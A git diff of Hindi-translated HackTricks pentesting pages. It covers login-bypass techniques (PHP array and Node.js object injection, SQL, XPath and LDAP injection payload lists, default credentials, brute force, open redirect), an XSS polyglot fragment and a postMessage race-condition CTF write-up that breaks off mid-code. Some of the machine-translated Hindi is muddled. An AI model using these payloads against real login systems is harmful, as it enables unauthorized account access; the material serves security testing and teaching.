* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** पर **फॉलो** करें
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs सबमिट करके।
</details>

View file

@ -1,42 +1,63 @@
# लॉगिन बापास
# लॉगिन बापास
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित** हो जाए? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करने की इच्छा रखते हैं? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल** हों या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**.
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** **करें**
* **हैकिंग ट्रिक्स साझा करें** द्वारा [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके
</details>
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा इवेंट है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उबलता हुआ मिलन स्थान है।
[**RootedCON**](https://www.rootedcon.com/) **स्पेन** में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उफान मिलने का समारोह है।
{% embed url="https://www.rootedcon.com/" %}
## **नियमित लॉगिन बापास**
## **नियमित लॉगिन बापास**
यदि आपको लॉगिन पेज मिलता है, तो यहां आप कुछ तकनीकें ढूंढने के लिए प्रयास कर सकते हैं:
यदि आप एक लॉगिन पृष्ठ पाते हैं, तो यहाँ आप कुछ तकनीक पाएंगे जिन्हें बायपास करने की कोशिश कर सकते हैं:
* पेज के अंदर **टिप्पणियों** की जांच करें (नीचे और दाएं जाएं?)
* जांचें कि क्या आप **प्रतिबंधित पेजों तक सीधे पहुंच सकते हैं**
* **पैरामीटर्स को न भेजें** (कोई भेजें नहीं या केवल 1)
* **PHP तुलना त्रुटि की जांच करें:** `user[]=a&pwd=b` , `user=a&pwd[]=b` , `user[]=a&pwd[]=b`
* **सामग्री प्रकार को json में बदलें** और json मान (bool true समेत) भेजें
* यदि आपको पोस्ट का जवाब मिलता है कि पोस्ट समर्थित नहीं है, तो आप `Content-Type: application/json` के साथ GET अनुरोध के साथ JSON को शरीर में भेजने की कोशिश कर सकते हैं
* पृष्ठ के अंदर **टिप्पणियाँ** की जाँच करें (नीचे और दाएं जाएं?)
* देखें कि क्या आप **प्रतिबंधित पृष्ठों तक सीधे पहुंच सकते हैं**
* **पैरामीटर न भेजें** (केवल 1 न भेजें या कोई भी न भेजें)
* **PHP तुलना त्रुटि जांचें:** `user[]=a&pwd=b` , `user=a&pwd[]=b` , `user[]=a&pwd[]=b`
* **कंटेंट प्रकार को json में बदलें** और json मान भेजें (bool true समाविष्ट)
* यदि आपको एक प्रतिक्रिया मिलती है जो कहती है कि POST समर्थित नहीं है तो आप `Content-Type: application/json` के साथ GET अनुरोध के साथ **शरीर में JSON भेजने की कोशिश कर सकते हैं**
* नोडजेएस की संभावित पार्सिंग त्रुटि की जांच करें (इसे पढ़ें [**यह**](https://flattsecurity.medium.com/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql-90b27f6542b4)): `password[password]=1`
* नोडजेएस उस पेलोड को निम्नलिखित क्वेरी के लिए एक क्वेरी में बदल देगा: ` SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` `` `**`password=password=1`**`;` जिससे पासवर्ड बिट हमेशा सच हो जाएगा।
* यदि आप एक JSON ऑब्जेक्ट भेज सकते हैं, तो आप लॉगिन को बाईपास करने के लिए `"password":{"password": 1}` भेज सकते हैं।
* ध्यान दें कि इस लॉगिन को बाईपास करने के लिए आपको अभी भी **एक मान्य उपयोगकर्ता नाम जानने और भेजने की आवश्यकता है**
* `mysql.createConnection` को बुलाने के समय `"stringifyObjects":true` विकल्प जोड़ने से अंततः **जब पैरामीटर में `Object` पास किया जाता है**, सभी अप्रत्याशित व्यवहारों को ब्लॉक कर देगा।
* नोडजेएस उस payload को एक क्वेरी में बदल देगा जो निम्नलिखित के समान होगी: ` SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` `` `**`password=password=1`**`;` जिससे पासवर्ड बिट हमेशा सच हो जाएगा।
* यदि आप एक JSON ऑब्जेक्ट भेज सकते हैं तो आप लॉगिन को बायपास करने के लिए `"password":{"password": 1}` भेज सकते हैं।
* ध्यान रखें कि इस लॉगिन को बायपास करने के लिए आपको अब भी **एक मान्य उपयोगकर्ता का पता करना और भेजना** होगा
* `mysql.createConnection` को बुलाते समय **"stringifyObjects":true** विकल्प जोड़ना आखिरकार सभी अप्रत्याशित व्यवहारों को ब्लॉक कर देगा जब `Object` पैरामीटर में पास किया जाएगा।
* क्रेडेंशियल्स की जांच करें:
* उपयोग की गई तकनीक/प्लेटफॉर्म के [**डिफ़ॉल्ट क्रेडेंशियल्स**](../../generic-methodologies-and-resources/brute-force.md#default-credentials)
* **सामान्य कॉम्बिनेशन** (रूट, एडमिन, पासवर्ड, तकनीक का नाम, इनमें से किसी पासवर्ड के साथ डिफ़ॉल्ट उपयोगकर्ता)।
* **Cewl** का उपयोग करके एक शब्दकोश बनाएं, **डिफ़ॉल्ट** उपयोगकर्ता नाम और पासवर्ड (यदि हो)
* उपयोग की गई प्रौद्योगिकी/प्लेटफ़ॉर्म के [**डिफ़ॉल्ट क्रेडेंशियल्स**](../../generic-methodologies-and-resources/brute-force.md#default-credentials)
* **सामान्य कॉम्बिनेशन** (रूट, एडमिन, पासवर्ड, तकनीक का नाम, इनमें से किसी एक के साथ डिफ़ॉल्ट उपयोगकर्ता).
* **Cewl** का उपयोग करके एक शब्दकोश बनाएं, **डिफ़ॉल्ट** उपयोगकर्ता नाम और पासवर्ड जोड़ें (यदि है) और सभी शब्दों का उपयोग करके उपयोगकर्ता नाम और पासवर्ड के रूप में ब्रूट-फोर्स करने की कोशिश करें
* **बड़े शब्दकोश का उपयोग करके ब्रूट-फोर्स** करें ([**ब्रूट फोर्स**](../../generic-methodologies-and-resources/brute-force.md#http-post-form)**)**
### SQL Injection प्रमाणीकरण बायपास
[यहाँ आप **SQL इंजेक्शन** के माध्यम से लॉगिन को बायपास करने के कई तरीके पाएंगे](../sql-injection/#authentication-bypass)।
निम्नलिखित पृष्ठ पर आप एक **कस्टम सूची पाएंगे जिसे आप लॉगिन को बायपास करने की कोशिश करने के लिए प्रयास कर सकते हैं** SQL इंजेक्शन के माध्यम से:
{% content-ref url="sql-login-bypass.md" %}
[sql-login-bypass.md](sql-login-bypass.md)
{% endcontent-ref %}
### No SQL Injection प्रमाणीकरण बायपास
[यहाँ आप **No SQL इंजेक्शन** के माध्यम से लॉगिन को बायपास करने के कई तरीके पाएंगे](../nosql-injection.md#basic-authentication-bypass)**।**
क्योंकि NoSQL इंजेक्शन को पैरामीटर मान को बदलने की आवश्यकता होती है, आपको उन्हें मैन्युअल रूप से टेस्ट करने की आवश्यकता होगी।
### XPath Injection प्रमाणीकरण बायपास
[यहाँ आप **XPath इंजेक्शन** के माध्यम से लॉगिन को बायपास करने के कई तरीके पाएंगे](../xpath-injection.md#authentication-bypass)।
```
' or '1'='1
' or ''='
@ -52,9 +73,9 @@
admin' or '
admin' or '1'='2
```
### LDAP Injection प्रमाणीकरण बापास
### LDAP Injection प्रमाणीकरण बापास
[यहां आपको **LDAP Injection** के माध्यम से लॉगिन बाइपास करने के कई ट्रिक्स मिलेंगे।](../ldap-injection.md#login-bypass)
[यहाँ आप कई तरह के ट्रिक्स पा सकते हैं जिनका उपयोग करके **LDAP Injection** के माध्यम से लॉगिन को बायपास किया जा सकता है।](../ldap-injection.md#login-bypass)
```
*
*)(&
@ -68,35 +89,15 @@ admin)(!(&(|
pwd))
admin))(|(|
```
### मुझे याद रखें
### याद रखें
अगर पेज में "**मुझे याद रखें**" की सुविधा है, तो देखें कि यह कैसे लागू किया गया है और क्या आप इसका दुरुपयोग करके **अन्य खातों को हासिल कर सकते हैं**
अगर पेज में "**याद रखें**" की कार्यक्षमता है तो देखें कि यह कैसे लागू किया गया है और क्या आप इसका दुरुपयोग करके **अन्य खातों को अधिकार में ले** सकते हैं
### रीडायरेक्ट
पेज आमतौर पर लॉगिन के बाद उपयोगकर्ताओं को रीडायरेक्ट करता है, देखें कि क्या आप उस रीडायरेक्ट को बदलकर [**ओपन रीडायरेक्ट**](../open-redirect.md) का कारण बना सकते हैं। शायद आप कुछ जानकारी (कोड, कुकीज...) चुरा सकते हैं अगर आप उपयोगकर्ता को अपनी वेबसाइट पर रीडायरेक्ट करते हैं।
पेज आम तौर पर लॉगिन के बाद उपयोगकर्ताओं को रीडायरेक्ट करते हैं, देखें कि क्या आप उस रीडायरेक्ट को बदलकर [**ओपन रीडायरेक्ट**](../open-redirect.md) का कारण बना सकते हैं। शायद आप कुछ जानकारी (कोड, कुकीज...) चुरा सकते हैं अगर आप उपयोगकर्ता को अपनी वेबसाइट पर रीडायरेक्ट करते हैं।
## अन्य जांचें
* लॉगिन की सुविधा का दुरुपयोग करके आप **उपयोगकर्ता नामों की गणना** कर सकते हैं।
* जांचें कि क्या पासवर्ड/**संवेदनशील** जानकारी **फॉर्म** के **इनपुट** में **ऑटो-पूरा** सक्रिय है: `<input autocomplete="false"`
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा इवेंट है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** की मिशन के साथ, यह कांग्रेस हर विषय में टेक्नोलॉजी और साइबर सुरक्षा विशेषज्ञों के लिए एक उबलता हुआ मिलन स्थल है।
{% embed url="https://www.rootedcon.com/" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की अनुमति चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details>
* जांचें कि क्या आप लॉगिन कार्यक्षमता का दुरुपयोग करके **उपयोगकर्ता नामों की गणना** कर सकते हैं।
* जांचें कि क्या **ऑटो-पूर्ण** पासवर्ड/**संवेदनशील** जानकारी **फॉर्म** में सक्रिय है **इनपुट:** `<input autocomplete="false"`

View file

@ -1,14 +1,14 @@
# वेब वल्न सूची
# वेब सुरक्षा सूची
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **ट्विटर** पर [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन हैकट्रिक्स में देखना चाहते हैं**? या क्या आप **नवीनतम संस्करण का उपयोग करना चाहते हैं या PEASS को डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details>
```python
@ -54,10 +54,10 @@ javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembe
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **नवीनतम संस्करण का उपयोग करना चाहते हैं PEASS या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** का **पालन** करें
* **अपने हैकिंग ट्रिक्स साझा करें PRs जमा करके [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)**.
</details>

View file

@ -1,28 +1,28 @@
# मुख्य पृष्ठ को ब्लॉक करके postmessage चोरी करना
# डालना मुख्य पृष्ठ को ब्लॉक करना postmessage चुराने के लिए
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल** हों या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके**।
</details>
## Iframes के साथ RC जीतना
## Iframes के साथ RCs जीतना
इस [**Terjanq writeup**](https://gist.github.com/terjanq/7c1a71b83db5e02253c218765f96a710) के अनुसार, नल उत्पन्न किए गए ब्लॉब निर्दिष्ट मूल्यों से सुरक्षा के लाभ के लिए अलग होते हैं, जिसका मतलब है कि यदि आप मुख्य पृष्ठ को व्यस्त रखते हैं, तो iframe पृष्ठ को निष्पादित किया जाएगा।
इस [**Terjanq writeup**](https://gist.github.com/terjanq/7c1a71b83db5e02253c218765f96a710) के अनुसार, नल उत्पत्तियों से बनाए गए ब्लॉब दस्तावेज सुरक्षा लाभों के लिए अलग होते हैं, जिसका मतलब है कि यदि आप मुख्य पृष्ठ को व्यस्त रखते हैं, तो आईफ्रेम पृष्ठ को निष्पादित किया जाएगा।
मूल रूप से उस चुनौती में एक **अलग किया गया iframe निष्पादित** होता है और उसके **बाद** जब यह **लोड हो जाता है**, **माता** पृष्ठ **एक post** संदेश भेजेगा जिसमें **ध्वज** होगा।\
हालांकि, यह postmessage संचार **XSS के लिए संकटग्रस्त है** (यह **iframe** JS कोड निष्पादित कर सकता है)।
मूल रूप से उस चुनौती में एक **अलग आईफ्रेम निष्पादित** होता है और **उसके बाद** यह **लोड** होता है, **मुख्य** पृष्ठ **एक पोस्ट** संदेश भेजेगा जिसमें **ध्वज** होगा।\
हालांकि, इस postmessage संचार में **XSS के लिए वंशानुगत** है (आईफ्रेम JS कोड निष्पादित कर सकता है)।
इसलिए, हमलावर का उद्देश्य है कि **माता iframe बनाए**, लेकिन **पहले** ही **माता** पृष्ठ को **व्यस्त रखें** और **पेलोड** को **iframe** में **भेजें**। जबकि **माता व्यस्त होता है**, **iframe पेलोड निष्पादित करता है** जो **माता postmessage संदेश सुनेगा और ध्वज छिपाएगा**।\
अंत में, iframe ने पेलोड निष्पादित कर दिया है और माता पृष्ठ व्यस्त नहीं रहता है, इसलिए यह ध्वज भेजता है और पेलोड इसे लीक करता है।
इसलिए, हमले करने वाले का लक्ष्य है कि **मुख्य आईफ्रेम बनाएं**, लेकिन **पहले** **मुख्य** पृष्ठ को **व्यस्त रखें** और **आईफ्रेम को पेश करने से पहले** **मुख्य** पृष्ठ **संवेदनशील डेटा (ध्वज) भेजें** के लिए **इसे व्यस्त रखें** और **आईफ्रेम को पेश करें**। जब तक **मुख्य व्यस्त है**, **आईफ्रेम पेश करेगा** जो कुछ JS होगा जो **मुख्य postmessage संदेश के लिए सुनेगा और ध्वज लीक करेगा**।\
अंततः, आईफ्रेम ने पेलोड निष्पादित किया है और मुख्य पृष्ठ व्यस्त होना बंद कर दिया है, इसलिए वह ध्वज भेजता है और पेलोड इसे लीक करता है।
लेकिन कैसे करें आप माता को **व्यस्त रखें जब वह iframe उत्पन्न करता है और जब वह इसे संवेदनशील डेटा भेजने के लिए तैयार हो रहा है?** मूल रूप से, आपको माता **निष्पादित** करने के लिए **असिंक्रोन** क्रिया ढूंढनी होगी। उदाहरण के लिए, उस चुनौती में माता **postmessages** को ऐसे **सुन रहा था**:
लेकिन आप मुख्य को **व्यस्त कैसे बना सकते हैं जिसे उसने आईफ्रेम उत्पन्न किया है और बस जब वह आईफ्रेम को तैयार होने का इंतजार कर रहा है, तब**? मूल रूप से, आपको **व्यस्त** **क्रिया** ढूंढनी होगी जिसे आप मुख्य **निष्पादित** कर सकते हैं। उदाहरण के लिए, उस चुनौती में मुख्य **postmessages** को इस तरह सुन रहा था:
```javascript
window.addEventListener('message', (e) => {
if (e.data == 'blob loaded') {
@ -30,21 +30,9 @@ $("#previewModal").modal();
}
});
```
तो यह संभव था कि एक **बड़ी पूर्णांक को postmessage में भेजा जाए**, जो उस तुलना में **स्ट्रिंग में परिवर्तित होगा**, जिसमें कुछ समय लगेगा:
इसलिए एक **बड़ा पूर्णांक postmessage में भेजना संभव था** जो उस तुलना में **स्ट्रिंग में परिवर्तित** होगा, जिससे कुछ समय लगेगा:
```bash
const buffer = new Uint8Array(1e7);
